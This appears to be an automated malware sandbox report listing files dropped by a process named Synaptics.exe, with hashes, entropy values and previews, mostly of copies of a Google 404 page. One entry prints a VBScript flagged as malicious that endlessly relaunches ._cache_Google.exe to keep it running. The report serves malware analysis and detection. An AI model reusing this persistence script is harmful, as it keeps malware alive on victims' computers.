                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.262087849349386
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0OSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+p+pAZewRDK4mW
                                                                                                                                                                          MD5:5790A39E27A68137D59CE25663786E2E
                                                                                                                                                                          SHA1:0C6B15353740EA1A6C2D8FDD7D8FC14A9A06AD23
                                                                                                                                                                          SHA-256:3B9A5A512B4A7C0E57A75D74CE94B60F5CA305AA6863DF0F3C6BEA5666E89729
                                                                                                                                                                          SHA-512:9AF82B1E8C0950580A2B1217DF19FEBE4398F220FE753361807F607A737011FA9FD426125231DAFA969DB3CC4301DAE5138492557732821D457D324412DA50B9
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.271096963902499
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          Malicious:false
Preview:HTML page titled "Error 404 (Not Found)!!1" (Google error page; remainder of markup and inline CSS omitted)
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.2571266931469545
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          Malicious:false
Preview:HTML page titled "Error 404 (Not Found)!!1" (Google error page; remainder of markup and inline CSS omitted)
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.254183540659821
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          Malicious:false
Preview:HTML page titled "Error 404 (Not Found)!!1" (Google error page; remainder of markup and inline CSS omitted)
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.265917128806119
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          Malicious:false
Preview:HTML page titled "Error 404 (Not Found)!!1" (Google error page; remainder of markup and inline CSS omitted)
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.27198139397482
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          Malicious:false
Preview:HTML page titled "Error 404 (Not Found)!!1" (Google error page; remainder of markup and inline CSS omitted)
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.250452657886789
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          Malicious:false
Preview:HTML page titled "Error 404 (Not Found)!!1" (Google error page; remainder of markup and inline CSS omitted)
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.271553559999301
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          Malicious:false
Preview:HTML page titled "Error 404 (Not Found)!!1" (Google error page; remainder of markup and inline CSS omitted)
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.264385738280794
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          Malicious:false
Preview:HTML page titled "Error 404 (Not Found)!!1" (Google error page; remainder of markup and inline CSS omitted)
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.268440962305017
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          Malicious:false
Preview:HTML page titled "Error 404 (Not Found)!!1" (Google error page; remainder of markup and inline CSS omitted)
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.259408113907637
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.250784972728303
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.25722993402053
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.260572161235495
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.259781721756828
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.253161863484117
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.248670856440285
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.2609606134338645
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.259828769541439
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+00SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+H+pAZewRDK4mW
                                                                                                                                                                          MD5:10481253502E6DC237CBEC6FF407EA44
                                                                                                                                                                          SHA1:5010044BA75B3E2788A284E2F328E3AA9C0EB0CE
                                                                                                                                                                          SHA-256:ECB0F9C7CF630CCE896773D2F0B2C1640CF02696BDFA35922CC8D5A3A529627F
                                                                                                                                                                          SHA-512:E840B55B06EFDC0368EE9BFDAFB9C5DB909FEE299F144AD80481D12B2691D2D71309A5A695DE9D3753DAC9E0DBE252F378AE7F88A58668F618F233E1E4A23D11
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="U4k6d79NafvG_13NTMtZfg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.2714398480599325
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+01SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+a+pAZewRDK4mW
                                                                                                                                                                          MD5:5402DC5FC07EFBF0F8D3019F8B676C10
                                                                                                                                                                          SHA1:C8F561D324DBF43ED924335FDB9E3F66C316A17E
                                                                                                                                                                          SHA-256:02360D156135AFF7B3D2D174CF1492F2296DD1F2F70217F01E691A9758A54BA6
                                                                                                                                                                          SHA-512:072F8791C5797250B46EC1BBA57C9AAFA4ECC4A47DA0EFB791679EE46F69940684FB40EAF18373709B482884EA1085477989D88B5AAA003F351E2A3E7FC99488
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="C5VVpRqSaHIE-ZrQhjxQmQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.260107376344088
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0qUSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6+pAZewRDK4mW
                                                                                                                                                                          MD5:048E54CE76837EB6DCDB8EF5CD3EDBAA
                                                                                                                                                                          SHA1:3858B2FF0832CFBAC477A6715E3532B3FB8DFC22
                                                                                                                                                                          SHA-256:BD35C1B6BBA859D191E6E0C2E057D07A1E90ECC51264098F42FAB25A6ECC4D97
                                                                                                                                                                          SHA-512:6B8164FEC826D2E5243FB5D76A7ABCF6F4485C0D1053EF7FB924DDC743D642E5AA511AD6B2DCD17C223114F107E66BEE0D6C822489B9EA242DBAC2F671445AF1
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="mwQB0lCntNmEtds9ICWhZA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.260045694064983
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0BSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+++pAZewRDK4mW
                                                                                                                                                                          MD5:B94D1F552330C73B42834F147B684605
                                                                                                                                                                          SHA1:45685B582486C4BD7D8FA9E8ED9DED8A1541B165
                                                                                                                                                                          SHA-256:F277BB62536503A948E72AD62935C03EE25743C6558ED80F0FF6AD4F9B19FFC7
                                                                                                                                                                          SHA-512:59B7FFEB78F36A7F728E4F1CA02038409A567D8BF4550F30180C75E7CABDEFF4D01B94B1385845881160CF80206920C0F998D1F28137CE7A7F4219F09A90CD9B
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="QpgvkVf3zFb0LNyynhX8mA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.266509646383657
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0mgSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+7g+pAZewRDK4mW
                                                                                                                                                                          MD5:F25222048E8510F14639605A88D92C1D
                                                                                                                                                                          SHA1:BF3FE9D8788035FA948DA5B928F1D97D73D6E8E0
                                                                                                                                                                          SHA-256:33799D7E99D372A6813B70A051942A9DE012DD25555C880BAE6BC5EAD30C45CB
                                                                                                                                                                          SHA-512:BD183F16CD90492DEF66A968590B185040B4CDBA4A9FE306C7ACA315972BB6226B64EFB6DFBAF2DED066D67D59037DD0503E781765C2C3C8BCE62F6467784385
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Kr7muq2wZTqj94zTB9jHzg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\._cache_Google.exe
                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                          Category:modified
                                                                                                                                                                          Size (bytes):849
                                                                                                                                                                          Entropy (8bit):5.3473833786387965
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:dF/UFKDU/qaG2b6xI6C6x1xLxeQvJWAB/FVEMPENEZaVx5xCA:f/UFKIt+G+7xLxe0WABNVIqZaVzgA
                                                                                                                                                                          MD5:085EF8614C95EF30B9B55E400CC4F0D0
                                                                                                                                                                          SHA1:5B0A126071994ADFA289A23DDA3B9FB86A61387C
                                                                                                                                                                          SHA-256:5E1254C81B5B8ED63341FA92A1A8983B2294439655A410613FEE9C36A5BFC49B
                                                                                                                                                                          SHA-512:45AC0DF992ADDCA8D090E9975DB1A920C2355C9315D3A8DB879DA801EC5AD39AAF8B076DF46801BD6E6697D0996DF203EBA33604907EBA4F2C24DD27B428A29E
                                                                                                                                                                          Malicious:true
                                                                                                                                                                          Yara Hits:
                                                                                                                                                                          • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: C:\Users\user\AppData\Local\Temp\UAINOJ.vbs, Author: Joe Security
                                                                                                                                                                          Antivirus:
                                                                                                                                                                          • Antivirus: Avira, Detection: 100%
                                                                                                                                                                          Preview:On error resume next..Dim strComputer,strProcess,fileset..strProcess = "._cache_Google.exe"..fileset = """C:\Users\user\AppData\Local\Temp\._cache_Google.exe"""..strComputer = "." ..Dim objShell..Set objShell = CreateObject("WScript.Shell")..Dim fso..Set fso = CreateObject("Scripting.FileSystemObject")..while 1..IF isProcessRunning(strComputer,strProcess) THEN..ELSE..objShell.Run fileset..END IF..Wend..FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)..DIM objWMIService, strWMIQuery..strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"..SET objWMIService = GETOBJECT("winmgmts:" _..& "{impersonationLevel=impersonate}!\\" _ ..& strComputer & "\root\cimv2") ...IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN..isProcessRunning = TRUE..ELSE..isProcessRunning = FALSE..END IF..END FUNCTION
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:Microsoft Excel 2007+
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):18387
                                                                                                                                                                          Entropy (8bit):7.523057953697544
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:oUaZLPzMfVSa1VvYXmrsdPkLmDAx7r/l0:oUatwNSSvY2IdsHr/y
                                                                                                                                                                          MD5:E566FC53051035E1E6FD0ED1823DE0F9
                                                                                                                                                                          SHA1:00BC96C48B98676ECD67E81A6F1D7754E4156044
                                                                                                                                                                          SHA-256:8E574B4AE6502230C0829E2319A6C146AEBD51B7008BF5BBFB731424D7952C15
                                                                                                                                                                          SHA-512:A12F56FF30EA35381C2B8F8AF2446CF1DAA21EE872E98CAD4B863DB060ACD4C33C5760918C277DADB7A490CB4CA2F925D59C70DC5171E16601A11BC4A6542B04
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.264423168834771
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+00fFNzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+rNz+pAZewRDK4mW
                                                                                                                                                                          MD5:E24E9E62121A03FC0D2EB7FF748D31FA
                                                                                                                                                                          SHA1:DC3E62F3E61F9EA5BA4582CB2B88CDEB71799A07
                                                                                                                                                                          SHA-256:DB7742250FAB404A38B279F66D439B4FF518B3445451EC6D80A25C80520B9E97
                                                                                                                                                                          SHA-512:723F0DF8B7E0441AD1862F0A330A338317790E9FFFBA11BE4B3DA74D57671B00FA0DBB8EE66C1584F2FFA746B0F00D1F771C2E9B12BBCB719C3AD204C52C3B97
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Preview:<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="OMYfzZxgA4XbBb_OpgWvaw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px;}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}pre{white-space:pre-wrap;}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x5
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.260462124832062
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0bOqISU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+eOqI+pAZewRDK4mW
                                                                                                                                                                          MD5:6FB0A678670C6F3F1E2486DFFF3EE379
                                                                                                                                                                          SHA1:928E39BDFCE1FDC310D18B8740D6ADE934B0BFEB
                                                                                                                                                                          SHA-256:374A7BB5AF83EC91434A0969BAD3A9831D368EBF28F127B03760CC0F5972B203
                                                                                                                                                                          SHA-512:92668AC5EBC2ECEA4347C36FC48107F5D2472BF9AF31E0CAFA95759A04F69A8ACDADDBB8FD0A7978508D0FC1AC4D9B52B35398D774A73462A3FAB49B4BC27C56
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.259176696565207
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0uESU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+q+pAZewRDK4mW
                                                                                                                                                                          MD5:6617BEF7E7EE97846627D066F0A4827B
                                                                                                                                                                          SHA1:DD6F7D10705D024B25996BBD7514452406D9AE6E
                                                                                                                                                                          SHA-256:925F9F190124485FF47A31B089FBF3CE8513CEE2729403F7496091C60210867C
                                                                                                                                                                          SHA-512:C5CC995C22FFB4D9A1FFCC53A774153030EFA50E4D0B4B701B6670F4EBDA12E489942542FF6BF5FE64EBCFC1600806DECEB72584EB83EBE79301FD82D5C56C0E
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.254975106081996
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0H3SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+w+pAZewRDK4mW
                                                                                                                                                                          MD5:B4727F8E59818E3348C7A7CC60560CB4
                                                                                                                                                                          SHA1:C72E3126D69183043A087E1091E0E99510B1B852
                                                                                                                                                                          SHA-256:451954AEC7571D339CD86D4DB6357D8AF67673CFA3A751AAA42B68312BEAB650
                                                                                                                                                                          SHA-512:BE321A76053312C8933A621CB1DFAB43115889BEA6C9B84AAD170AE9C623CE10A01C811B76EB349F54CA92C2537FF7021510731A5E6E3D80A25253B6840579F5
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.272456923908169
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+09SU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+6+pAZewRDK4mW
                                                                                                                                                                          MD5:A2583AFB1972B002731602FA8E7006D0
                                                                                                                                                                          SHA1:374028A3C8AD973D3AFCADC6436D589B97E6F4DA
                                                                                                                                                                          SHA-256:F21C766043900696B2749DF5545B8147FB26E19333340A6004A6323D1314B2F1
                                                                                                                                                                          SHA-512:7B582152E3F1E61054A37930BD84AB99BAD2DF4A98FEEB2F448D85E87ED3077C2DD6D18F586880E2DF5829C2F9F3E4BA47691C73BA915BB15270445B99045188
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.269489567773702
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+0TIlzSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+os+pAZewRDK4mW
                                                                                                                                                                          MD5:A0D787612C25222970F13DDC7EA82BA4
                                                                                                                                                                          SHA1:0F68D50D98F1B1A081AB377688BE93B4A40D38BD
                                                                                                                                                                          SHA-256:283AC14BE8F3EF053BD5018050DE311FA662F3B575209C474BB3BBF3684272EB
                                                                                                                                                                          SHA-512:6E51AC5F79BC60DD8A7643FD463B13882DA8507DED3C3F280FFBE9E035D575EF21CD3B4F707AD89E15FAA942BAA2464108A065AA4820C6DDB42D44757DCBE069
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Process:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (1648), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1652
                                                                                                                                                                          Entropy (8bit):5.265550037150324
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:GgsF+07WSU6pepPQfkZbc6cn1BZdAe1nCr1LTHm6D9viLRIxv+5A:GgK+p+pAZewRDK4mW
                                                                                                                                                                          MD5:8B1B672BF8DFCD45B1AF8EA6EC0C7728
                                                                                                                                                                          SHA1:03B02BF217C905C0A11B015B06908110FB78AFCC
                                                                                                                                                                          SHA-256:F4EADD9EFE7FC76425A6838A672366E4BD1010E719C0F6301C28076F4BEEE752
                                                                                                                                                                          SHA-512:DC8F75B33CD2EDE4C312EFD36950AABF2A54F2192AB4AE303754848A1878D2ABFDED5510D3FE555EC861B77E8143DE27AB2E9668F9FE35F27F512B5006502FFF
                                                                                                                                                                          Malicious:false
